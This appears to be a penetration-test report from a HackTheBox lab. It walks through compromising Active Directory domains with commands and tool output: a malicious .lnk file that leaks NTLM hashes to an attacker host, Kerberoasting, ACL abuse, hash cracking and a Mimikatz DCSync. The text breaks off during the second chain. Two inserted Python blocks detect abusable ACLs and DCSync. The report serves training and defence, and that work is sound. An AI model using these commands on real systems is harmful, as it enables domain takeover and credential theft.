CPTS Updated Dec 2024

The document outlines a series of identified vulnerabilities during a security assessment, highlighting critical issues such as Remote Code Execution and SQL Injection. It details a successful attack chain that led to full administrative control over an Active Directory domain, demonstrating the exploitation of various vulnerabilities and misconfigurations. The report emphasizes the importance of prioritizing remediation efforts to mitigate risks associated with these vulnerabilities.

Figure 1 - Distribution of identified vulnerabilities

Below is a high-level overview of each finding identified during testing. These findings are covered in
depth in the Technical Findings Details section of this report.
#   Severity Level   Finding Name                                                          Page
1   9.0 (Critical)   Remote Code Execution (RCE)                                           42
2   8.8 (High)       SQL Injection (SQLi)                                                  45
3   8.5 (High)       Account Takeover                                                      47
4   7.5 (High)       Privilege Escalation On API                                           50
5   9.0 (Critical)   Remote Code Execution (RCE) On API                                    52
6   7.5 (High)       Werkzeug Console RCE via WEBSVC to SRVADM                             55
7   8.8 (High)       Docker Privilege Escalation SRVADM to ROOT                            58
8   9.3 (Critical)   Master Password Disclosure via NFS Share                              59
9   8.4 (High)       GlassFish Server RCE                                                  60
10  7.5 (High)       Privilege Escalation via SeLoadDriverPrivilege Enabled                63
11  7.8 (High)       SeDebugPrivilege Enabled                                              65
12  7.5 (High)       Privilege Escalation via Login Session Hijacking                      68
13  7.5 (High)       Account Takeover via Plain Text Credentials on Sticky Notes           71
14  8.8 (High)       Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)  73
15  0.0 (Info)       Zone Transfer                                                         75

CONFIDENTIAL
HACKTHEBOX

5 Internal Network Compromise Walkthrough

During the course of the assessment, the tester was able to gain a foothold via the external network,
move laterally, and compromise the internal network, leading to full administrative control over the
Trilocor.local Active Directory domain. The steps below show the path taken from initial access to
compromise and do not include all vulnerabilities and misconfigurations discovered during the course of
testing. Any issues not used as part of the path to compromise are listed as separate, standalone issues
in the Technical Findings Details section, ranked by severity level. The intent of this attack chain is
to demonstrate to Acme the impact of each vulnerability shown in this report and how they fit together
to show the overall risk to the client environment, and to help prioritize remediation efforts (i.e.,
patching two flaws quickly could break up the attack chain while the company works to remediate all
issues reported). While other findings shown in this report could be leveraged to gain a similar level
of access, this attack chain shows the initial path of least resistance taken by the tester to achieve
domain compromise.

5.1 Detailed Walkthrough

Tester performed the following to fully compromise the Trilocor.local domain.
1. The tester used LaZagne to extract the clear-text password of the pthorpe user, which allowed the
tester to log in to the domain-joined machine WS01.
2. The tester began initial enumeration with powerview.ps1 and BloodHound. These tools provided valuable
insight into the network and user privileges.
3. During enumeration, the tester discovered that pthorpe is a member of the PRINTER 4TH FLOOR group.
Additionally, the tester identified a share called print_job on DC01.trilocor.local.
4. The tester staged a phishing attack using a malicious .lnk file to capture NTLMv2 hashes. By placing
this file in the print_job share, the tester captured the NTLMv2 hash of user JFLEMMING using Inveigh.
5. Using BloodHound, the tester identified that JFLEMMING had a GenericWrite ACE on the user KSALINAS.
This finding provided a potential privilege escalation path.
6. The tester added a fake SPN to KSALINAS and performed a Kerberoasting attack using Rubeus. The
obtained hash was then cracked locally using hashcat.
7. With the cracked credentials, the tester logged in as KSALINAS. The user KSALINAS had the ACE
permissions necessary to continue.
8. The tester discovered that KSALINAS was a member of the MSSP CONNECT group, which had WriteOwner
permissions on the TIER I INFRASTRUCTURE group.
9. Leveraging the GenericWrite permissions, the tester added themselves to the MSSP CONNECT group.
10. With WriteOwner permissions on the TIER I INFRASTRUCTURE group, the tester changed the owner of the
TIER I INFRASTRUCTURE group to KSALINAS. This allowed the tester to add KSALINAS to the TIER I
INFRASTRUCTURE group.
11. The TIER I INFRASTRUCTURE group had GenericWrite permissions on the Fileshare Admins group. The
tester used these permissions to add KSALINAS to the Fileshare Admins group.
12. While exploring the network shares on DC01.trilocor.local, the tester identified a Department share
that contained private directories. Within the IT_BACKUP02072022 directory, the tester found an
encrypted VeraCrypt container.
13. Using hashcat, the tester cracked the password of the VeraCrypt container.
14. With the password in hand, the tester mounted the VeraCrypt container as a local drive, gaining
access to its contents.
15. Inside the mounted VeraCrypt container, the tester discovered a password-protected psafe3 file.
16. The tester transferred the psafe3 file to their local machine and used hashcat to crack its password.
17. After cracking the password, the tester found usernames and passwords for multiple users stored
within the psafe3 file.
18. Armed with these credentials, the tester logged in as a highly privileged service account,
svc_trilocorsync. This account had extensive access and control over the domain.
19. The svc_trilocorsync user had a WriteDACL ACE on the Trilocor.local domain. The tester exploited this
permission to grant DCSync rights to svc_trilocorsync using dacledit.py.
20. With DCSync rights, the tester used Mimikatz to extract the hash of the Administrator password,
thereby compromising the entire trilocor.local domain.

Detailed reproduction steps for this attack chain are as follows:

The tester already had administrative access on the WS01 machine and used LaZagne.exe to retrieve
plaintext passwords stored on the machine. The tester discovered that the plaintext password saved by
Pidgin led to the compromise of the pthorpe account.

Figure 2 - Screenshot

The tester then used runas to open a shell as that account on the WS01 machine:

runas /user:trilocor\pthorpe cmd

This provided a command shell. From there, the tester used powershell -ep bypass to obtain PowerShell
access for further enumeration.


Figure 3 - Powershell

The pthorpe user is a member of the PRINTER 4TH FLOOR group. The tester listed all shares associated
with it using PowerView.

On DC01.trilocor.local the tester detected the Print_Jobs share, which could be used for a phishing
attack with a malicious .lnk file.

The tester then created a malicious .lnk file using PowerShell:

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\Malicious.lnk")
$lnk.TargetPath = "\\<attackerIP>\@threat.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the dir this file lives in will perform an authentication request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

They copied C:\Malicious.lnk to \\DC01.trilocor.local\Print_jobs and renamed it to @Malicious.lnk to
ensure it appears at the top of the directory:


Figure 4 - Malicious Lnk File

Next, the tester started Inveigh to capture hashes and captured the hash of JFLEMMING within one minute:

Invoke-Inveigh -ConsoleOutput Medium -ConsoleUnique N -NBNS Y -mDNS Y -FileOutput Y -FileOutputDirectory C:\Users\Public\ -SMB Y


Figure 5 - Inveigh Output


The tester then used hashcat to crack the captured hash:

╭─kali@kali ~/Desktop/CPTS/DC01/HASH
╰─$ hashcat flamming.txt ~/Tools/wordlist/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

JFLEMMING::trilocor:8d99e2872749255b:dd9ed1206c2b05247588110dd754decc:010
[[ SNIP ]]
2e00310036002e003100330039002e00330035000000000000000000:[[ REDACTED ]]

Now the tester can log in with the cracked password. On the local machine, the tester started a
ligolo-ng listener on port 445 to transfer SharpHound.exe to the WS01 machine:

listener_add --addr 0.0.0.0:445 --to 0.0.0.0:445


Now on the local machine an SMB share is started using the impacket-smbserver tool:

impacket-smbserver share -smb2support $(pwd)

The tester copied sharphound.exe to the WS01 machine under C:\users\public and ran it; in the same way,
files can be copied back to the SMB share using PowerShell.

From the BloodHound results for WS01, the tester identified that user JFLEMMING is a member of the HELP
DESK MANAGERS group, which has a GenericWrite ACE, allowing a targeted Kerberoast attack using PowerView
and Rubeus.

Figure 6 - Kerberoast Attack

They created a PSCredential object:

$SecPassword = ConvertTo-SecureString '[[PASSWORD REDACTED]]' -AsPlainText -Force
$Cred2 = New-Object System.Management.Automation.PSCredential('trilocor\JFLEMMING', $SecPassword)

Then, using powerview.ps1, they set an SPN on the KSALINAS user:

Set-DomainObject -Credential $Cred2 -Identity KSALINAS -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}

and viewed the SPN using a PowerView command:

Get-NetUser -SPN | select serviceprincipalname


Figure 7 - SPN View

They then used Rubeus.exe to perform a Kerberoast attack and saved the hash to hashes.kerberoast:

PS C:\Users\Public> .\Rubeus.exe kerberoast /user:ksalinas /

Figure 8 - Kerberos attack

The tester then used the SMB share to copy the output to the local machine and cracked the Kerberos
hash using hashcat:

╭─kali@kali ~/Desktop/CPTS/DC01
╰─$ hashcat hashes.kerberoast ~/Tools/wordlist/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5tgs$23$*ksalinas$trilocor.local$nonexistent/BLAHBLAH@trilocor.local*$3079bcf13a6b71ed58ce841fd3511ef3$664b27c326c1df5
[[ SNIP ]]
eb4cd5f87bd41658b0c0ea0c58ff343f50283ca6e523a2a9f39ce92981ca9f45c00bdaf31ea8424f046973227eea1e43d38c436047aa9726383d6c3432d11314ba9bd3c026:[[ REDACTED ]]

Now the tester has the password for the ksalinas user and is able to log in with these credentials.

Figure 9 - Logged In

The user ksalinas was found to have a Self ACE on the MSSP CONNECT group:


Figure 10 - MSSP Connect

so the tester can add ksalinas to the MSSP CONNECT group using the PowerShell command:

Add-DomainGroupMember -identity "MSSP Connect" -Members ksalinas -Domain trilocor.local

Now the tester can add ksalinas to the TIER I INFRASTRUCTURE group, leveraging these permissions with
PowerView commands.

The tester sets ksalinas as the object owner of TIER I INFRASTRUCTURE using PowerView:

Set-DomainObjectOwner -Identity "TIER I INFRASTRUCTURE" -OwnerIdentity "ksalinas" -v

Now the ksalinas user can add themselves to the TIER I INFRASTRUCTURE group:

Add-DomainGroupMember -Identity "TIER I INFRASTRUCTURE" -Members ksalinas -Domain trilocor.local

Using BloodHound, the tester then discovered that TIER I INFRASTRUCTURE has a GenericWrite ACE on
Fileshare Admins, enabling them to add ksalinas to that group:


The tester can check for more information using PowerView commands:

PS C:\Users\Public> $sid = Convert-NameToSid "TIER I INFRASTRUCTURE"
PS C:\Users\Public> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
[[ SNIP ]]
ObjectDN              : CN=Fileshare Admins,OU=Security Groups,OU=Corp,DC=trilocor,DC=local
ObjectSID             : S-1-5-21-748909465-2105014040-255522671-1721
ActiveDirectoryRights : GenericWrite
BinaryLength          : 36
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131112
SecurityIdentifier    : S-1-5-21-748909465-2105014040-255522671-1716
AceType               : AccessAllowed
AceFlags              : ContainerInherit
IsInherited           : False
InheritanceFlags      : ContainerInherit
PropagationFlags      : None
AuditFlags            : None
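The AccessMask value 131112 in the record above is the numeric form of the ActiveDirectoryRights flags: 0x20028 = ReadControl | WriteProperty | Self, which the enum names GenericWrite. The Python helper below is an added example, not part of the report or of PowerView: it parses "Key : Value" records in the format shown, decodes the mask into named rights, and flags entries that give a non-admin trustee write control over an object, which is the audit a defender runs over a full Get-DomainObjectACL dump to find chains like the one in this report. The expected-admin SID list and the two extra records appended to the sample (a Domain Admins ACE and a read-only ACE on the same group) are assumptions made for the example.

```python
import re
from typing import Dict, List

# Flag values of System.DirectoryServices.ActiveDirectoryRights, which is what the
# AccessMask column of PowerView and of Get-Acl on the AD: drive reports.
AD_RIGHTS = {
    "CreateChild": 0x1, "DeleteChild": 0x2, "ListChildren": 0x4, "Self": 0x8,
    "ReadProperty": 0x10, "WriteProperty": 0x20, "DeleteTree": 0x40, "ListObject": 0x80,
    "ExtendedRight": 0x100, "Delete": 0x10000, "ReadControl": 0x20000,
    "WriteDacl": 0x40000, "WriteOwner": 0x80000, "Synchronize": 0x100000,
    "AccessSystemSecurity": 0x1000000,
}
# Composite values the same enum names; reported only when fully contained in the mask.
AD_GENERIC = {"GenericAll": 0xF01FF, "GenericWrite": 0x20028,
              "GenericRead": 0x20094, "GenericExecute": 0x20004}
# Rights that let the trustee modify the object (membership, SPNs, ACL, owner) or use a control right.
ABUSABLE = {"GenericAll", "GenericWrite", "WriteProperty", "Self",
            "WriteDacl", "WriteOwner", "ExtendedRight"}
# Trustees expected to hold write rights (assumption): well-known admin SIDs and domain RIDs.
EXPECTED_SIDS = {"S-1-5-18", "S-1-5-32-544"}          # SYSTEM, BUILTIN\Administrators
EXPECTED_RIDS = {500, 512, 516, 518, 519}              # Administrator, Domain/Enterprise/Schema Admins, DCs


def decode_access_mask(mask: int) -> List[str]:
    """Translate a numeric AccessMask into ActiveDirectoryRights names."""
    names = [n for n, v in AD_GENERIC.items() if mask & v == v]
    names += [n for n, v in AD_RIGHTS.items() if mask & v]
    return names


def parse_ace_records(text: str) -> List[Dict[str, str]]:
    """Parse 'Key : Value' records (Get-DomainObjectACL output) separated by blank lines."""
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def is_expected_trustee(sid: str) -> bool:
    """True for SIDs that are supposed to hold write rights over directory objects."""
    if sid in EXPECTED_SIDS:
        return True
    m = re.fullmatch(r"S-1-5-21-\d+-\d+-\d+-(\d+)", sid)
    return bool(m) and int(m.group(1)) in EXPECTED_RIDS


def triage(records: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag allow-ACEs that grant abusable rights to trustees outside the expected admin set."""
    findings: List[Dict[str, object]] = []
    for r in records:
        rights = decode_access_mask(int(r.get("AccessMask", "0")))
        risky = sorted(ABUSABLE.intersection(rights))
        trustee = r.get("SecurityIdentifier", "")
        if risky and r.get("AceType", "AccessAllowed") == "AccessAllowed" and not is_expected_trustee(trustee):
            findings.append({"trustee": trustee, "object": r.get("ObjectDN", ""),
                             "rights": risky, "inherited": r.get("IsInherited") == "True"})
    return findings


# Sample input: the record shown above (TIER I INFRASTRUCTURE -> Fileshare Admins) followed by two
# constructed records: a Domain Admins (RID 512) GenericAll ACE and a Domain Users (RID 513) read ACE.
SAMPLE_ACL = """
ObjectDN              : CN=Fileshare Admins,OU=Security Groups,OU=Corp,DC=trilocor,DC=local
ObjectSID             : S-1-5-21-748909465-2105014040-255522671-1721
ActiveDirectoryRights : GenericWrite
AccessMask            : 131112
SecurityIdentifier    : S-1-5-21-748909465-2105014040-255522671-1716
AceType               : AccessAllowed
IsInherited           : False

ObjectDN              : CN=Fileshare Admins,OU=Security Groups,OU=Corp,DC=trilocor,DC=local
AccessMask            : 983551
SecurityIdentifier    : S-1-5-21-748909465-2105014040-255522671-512
AceType               : AccessAllowed
IsInherited           : True

ObjectDN              : CN=Fileshare Admins,OU=Security Groups,OU=Corp,DC=trilocor,DC=local
AccessMask            : 131220
SecurityIdentifier    : S-1-5-21-748909465-2105014040-255522671-513
AceType               : AccessAllowed
IsInherited           : False
"""

if __name__ == "__main__":
    for f in triage(parse_ace_records(SAMPLE_ACL)):
        print(f"{f['trustee']} -> {f['object']}: {', '.join(f['rights'])}")
```

Run over the full dump, the output is the list of edges BloodHound would draw; resolving each trustee SID and asking whether that group really needs WriteProperty or Self over the target is the remediation step.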

Now the tester can abuse this ACE to add ksalinas to the Fileshare Admins group using PowerView:


Add-DomainGroupMember -Identity "Fileshare Admins" -Members ksalinas -Domain trilocor.local

Now ksalinas is a member of Fileshare Admins:

net user ksalinas /domain

Now that ksalinas is a member of Fileshare Admins, the user is able to view the private SMB shares.
While checking the shares, the tester detected a Department share on DC01.trilocor.local with read and
write permission.

Figure 11 - Private Shares

The tester mounted the share on the WS01 machine using the net use command:

net use I: \\DC01.trilocor.local\"Deparment Share"

The tester then used the tree command to list all directories and found an interesting directory,
IT_BACKUP02072022, inside the Private directory.


Figure 12 - IT Backup

The tester found a VeraCrypt container file inside this directory.


The tester copied the Trilocor_backup_03072022.vc file to the local machine and cracked its password
using hashcat:

hashcat -m 13751 Trilocor_backup_03072022.vc ~/Tools/wordlist/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1438/2940 MB (512 MB allocatable), 4MCU

[[ SNIP ]]
Initialized device kernels and memory
Starting self-test. Please be patient...
Finished selftest
Dictionary cache hit:
* Filename..: /home/kali/Tools/wordlist/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

Starting autotune. Please be patient...
Finished autotune
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>

Trilocor_backup_03072022.vc:[[ REDACTED ]]

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13751 (VeraCrypt SHA256 + XTS 512 bit (legacy))
Hash.Target......: Trilocor_backup_03072022.vc
[[ SNIP ]]

The tester then mounted the decrypted container using VeraCrypt.

Figure 13 - Veracrypt

Now the tester can view the contents from the mounted drive.

The tester discovered a psafe3 file, which is password protected.

The tester was able to crack its password with hashcat and access its contents using pwsafe:

╭─kali@kali ~/Desktop/CPTS/DC01/encrypted
╰─$ hashcat -m 5200 trilocor_svc_vault.psafe3 ~/Tools/wordlist/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC,
[[ SNIP ]]
Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /home/kali/Tools/wordlist/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

trilocor_svc_vault.psafe3:[[ REDACTED ]]

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: trilocor_svc_vault.psafe3
[[ SNIP ]]

Figure 14 - Psafe3

Inside this file the tester was able to view the usernames and passwords for the following users:

svc_mssql
svc_sql
svc_ipmi
svc_azc
svc_trilocorsync

Using these, the tester was able to log in as the svc_trilocorsync user:

runas /user:trilocor\svc_trilocorsync cmd

svc_trilocorsync has a WriteDACL ACE on Trilocor.local; this can be exploited with a tool like dacledit.py:

dacledit.py -action 'write' -rights 'DCSync' -principal 'svc_trilocorsync' -target-dn 'DC=TRILOCOR,DC=LOCAL' trilocor.local/svc_trilocorsync:[[ REDACTED ]] -dc-ip 172.16.139.3

Now svc_trilocorsync has the DCSync rights assigned, so the tester can perform a DCSync attack and
retrieve the hash of the Administrator or krbtgt account using Mimikatz:

PS C:\Users\Public> C:\Users\Public\mimikatz.exe "lsadump::dcsync /user:trilocor\administrator" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:trilocor\administrator
[DC] 'trilocor.local' will be the domain
[DC] 'DC01.trilocor.local' will be the DC server
[DC] 'trilocor\administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00110200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD NOT_DELEGATED )
Account expiration   :
Password last change : 9/15/2022 1:30:42 AM
Object Security ID   : S-1-5-21-748909465-2105014040-255522671-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: [[ REDACTED ]]

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 0e8a014b39861cb4940f941f5e5d31bc

* Primary:Kerberos-Newer-Keys *
    Default Salt : TRILOCOR.LOCALAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : [[ REDACTED ]]
      aes128_hmac       (4096) : [[ REDACTED ]]
      des_cbc_md5       (4096) : [[ REDACTED ]]
    OldCredentials
      aes256_hmac       (4096) : [[ REDACTED ]]
      aes128_hmac       (4096) : [[ REDACTED ]]
      des_cbc_md5       (4096) : [[ REDACTED ]]
    OlderCredentials
      aes256_hmac       (4096) : [[ REDACTED ]]
      aes128_hmac       (4096) : [[ REDACTED ]]
      des_cbc_md5       (4096) : [[ REDACTED ]]

* Primary:Kerberos *
    Default Salt : TRILOCOR.LOCALAdministrator
    Credentials
      des_cbc_md5       : 8c850d9da24cbc7c
    OldCredentials
[[ SNIP ]]

mimikatz(commandline) # exit
Bye!

Now the tester can log in to DC01 as Administrator.
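Both steps above leave an audit trail on the domain controller: the dacledit.py call is a write to nTSecurityDescriptor on the domain head (event 5136 with Audit Directory Service Changes enabled), and the DCSync itself is a directory-service access (event 4662) that exercises the replication control-access rights, provided a SACL on the domain object audits them. The Python below is an added example, not code from the report or from any of the tools it mentions: it reports replication-right use by accounts outside an allowlist and any ACL rewrite of the domain object. The sample events are constructed, and the authorized-account list (the domain controller plus any directory-sync accounts that legitimately replicate) is an assumption.

```python
import re
from typing import Dict, Iterable, List, Set

# rightsGuid values of the replication control-access rights a DCSync caller needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)


def replication_rights_in(properties: str) -> List[str]:
    """Names of replication rights referenced in a 4662 'Properties' field."""
    names: List[str] = []
    for guid in GUID_RE.findall(properties):
        name = REPLICATION_RIGHTS.get(guid.lower())
        if name and name not in names:
            names.append(name)
    return names


def detect_dcsync(events: Iterable[Dict], authorized: Set[str]) -> List[Dict]:
    """4662 events exercising replication rights from any account not on the authorized list
    (lower-cased sAMAccountNames of domain controllers and known directory-sync accounts)."""
    alerts: List[Dict] = []
    for e in events:
        if e.get("EventID") != 4662 or e.get("AccessMask") != "0x100":   # 0x100 = control access
            continue
        rights = replication_rights_in(e.get("Properties", ""))
        if not rights or e.get("SubjectUserName", "").lower() in authorized:
            continue
        alerts.append({"time": e["TimeCreated"],
                       "subject": f"{e.get('SubjectDomainName', '')}\\{e['SubjectUserName']}",
                       "object": e.get("ObjectName", ""), "rights": rights})
    return alerts


def detect_domain_acl_changes(events: Iterable[Dict]) -> List[Dict]:
    """5136 events that rewrite nTSecurityDescriptor on the domain head (how a DCSync grant appears)."""
    return [{"time": e["TimeCreated"], "subject": e.get("SubjectUserName", ""),
             "object": e.get("ObjectDN", "")}
            for e in events
            if e.get("EventID") == 5136 and e.get("ObjectClass") == "domainDNS"
            and e.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"]


# Constructed sample events mirroring the steps above; field names follow the Windows event XML schema.
# The fourth event is an unrelated attribute write and carries a placeholder GUID.
SAMPLE_EVENTS = [
    {"EventID": 5136, "TimeCreated": "2024-06-11T01:58:00", "SubjectUserName": "svc_trilocorsync",
     "ObjectDN": "DC=trilocor,DC=local", "ObjectClass": "domainDNS",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "TimeCreated": "2024-06-11T02:01:10", "SubjectUserName": "DC01$",
     "SubjectDomainName": "TRILOCOR", "ObjectName": "DC=trilocor,DC=local", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "TimeCreated": "2024-06-11T02:03:27", "SubjectUserName": "svc_trilocorsync",
     "SubjectDomainName": "TRILOCOR", "ObjectName": "DC=trilocor,DC=local", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "TimeCreated": "2024-06-11T02:04:00", "SubjectUserName": "jflemming",
     "SubjectDomainName": "TRILOCOR", "ObjectName": "CN=ksalinas,CN=Users,DC=trilocor,DC=local",
     "AccessMask": "0x20", "Properties": "{00000000-0000-0000-0000-000000000000}"},
]

if __name__ == "__main__":
    for a in detect_domain_acl_changes(SAMPLE_EVENTS) + detect_dcsync(SAMPLE_EVENTS, {"dc01$"}):
        print(a)
```

An account named like a sync service is exactly the kind that ends up on the allowlist by habit, so the ACL-change rule matters as much as the replication rule: a legitimate sync account is granted replication rights once, by an administrator, not by itself minutes before it first replicates.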


Tester then performed the following to fully compromise the Trilocorai.local domain.

1. The tester has access to the DC01 machine as an administrator on the domain trilocor.local.
2. The tester used PowerView to enumerate and found that trilocor.local has a bidirectional trust with
trilocorai.local.
3. The tester used ligolo-ng to set up a tunnel, which gives direct access to the new IP range
172.16.210.0/24 from the local machine.
4. The tester used PowerView to enumerate accounts in the trilocorai.local domain that have SPNs
associated with them.
5. The tester found that the account svc_datakeeper has an SPN in the trilocorai.local domain, so it can
be Kerberoasted and the hash cracked offline; with the password, the tester can log in to the
trilocorai.local domain.
6. The tester performed the Kerberoasting attack across the trust using Rubeus.
7. The tester ran the hash through hashcat, cracked it, and logged in as the svc_datakeeper user on DC02.
8. svc_datakeeper is a normal user on DC02, so from there the tester enumerated further for local
privilege escalation.
9. On DC02 the tester found the username and password of svc_veracrypt.
10. The tester logged in as svc_veracrypt and found that this account holds SeBackupPrivilege, which
allows the user to copy the ntds.dit and SYSTEM files.
11. Using secretsdump.py, the tester extracted the hashes of the users on the system.
12. The tester logged in as the Administrator user on DC02 using pass-the-hash.
13. In the Documents directory, the tester found the encrypted password in the svc_ipmi.Cred file.
14. The tester decrypted the password and used it on the http://172.16.210.21:8080/ application running
on the ADMIN01 machine. The ipMonitor application's functionality to execute commands on the server
allowed the tester to change the Administrator password and log in to the ADMIN01 machine.

Detailed reproduction steps for this attack chain are as follows:

The tester had already compromised DC01, the domain controller of the trilocor.local domain. This
domain has a cross-forest trust with the trilocorai.local domain.


Figure 15 - Powerview


Figure 16 - BloodHound

From the DC01 machine, the tester used PowerView to enumerate accounts in the trilocorai.local domain
that have SPNs associated with them:

PS C:\Users\Public> Get-DomainUser -SPN -Domain trilocorai.local | select SamAccountName

samaccountname
--------------
svc_datakeeper
krbtgt

The tester can see that the account svc_datakeeper has an SPN in the trilocorai.local domain, so the
tester can Kerberoast it and crack the hash offline, then log in to the trilocorai.local domain with the
password.

PS C:\Users\Public> Get-DomainUser -Domain trilocorai.local -Identity svc_datakeeper | select samaccountname,memberof

samaccountname memberof
-------------- --------
svc_datakeeper {CN=Remote Management Users,CN=Builtin,DC=trilocorai,DC=local,
               CN=Event Log Readers,CN=Builtin,DC=tri...

The tester then performed a Kerberoasting attack using Rubeus:


PS C:\users\public> .\Rubeus.exe kerberoast /domain:trilocorai.local /user:svc_datakeeper /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v2.2.1

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User            : svc_datakeeper
[*] Target Domain          : trilocorai.local
[*] Searching path 'LDAP://DC02.trilocorai.local/DC=trilocorai,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=svc_datakeeper)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1

[*] SamAccountName         : svc_datakeeper
[*] DistinguishedName      : CN=svc_datakeeper,CN=Users,DC=trilocorai,DC=local
[*] ServicePrincipalName   : datakeeper/admin01.trilocorai.local:80
[*] PwdLastSet             : 7/26/2022 7:09:36 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*svc_datakeeper$trilocorai.local$datakeeper/admin01.trilocorai.local:80@trilocorai.local*$A84C68FC7426B7AD168BA02412A6F372$C242D39318C7AE280DAB0296A94FB53FE00E452CAF633B01CBABD5DF94B06F50739[[ SNIP ]]

PS C:\users\public>
//t

Now the tester can copy this to the local machine and crack the hash using hashcat:

╭─kali@kali ~/Desktop/CPTS/DC02
╰─$ hashcat hash.txt ~/Tools/wordlist/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

[[ SNIP ]]
Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /home/kali/Tools/wordlist/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$krb5tgs$23$*svc_datakeeper$trilocorai.local$datakeeper/admin01.trilocorai.local:80@trilocorai.local*$a84c68fc7426b7ad168ba02412a6f372$c242d39318c7ae280dab0296a94fb53fe00e452caf633b01cbabd5df94b06f50739
[[ SNIP ]]
8c7ab9b8b9a5f22a5fe6ab52e94ee827c2952506763ef9fe4aa9ad8d948f31b4feced23145e4102ee2f7bc5c700fe8a32ea806ffbf350ca57edf8b56941b4ad0b05e48961341e34af3a7c74f:[[ REDACTED ]]

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_datakeeper$trilocorai.local$datake...a7c74f
Time.Started.....: Tue Jun 11 02:14:33 2024 (8 secs)
[[ SNIP ]]
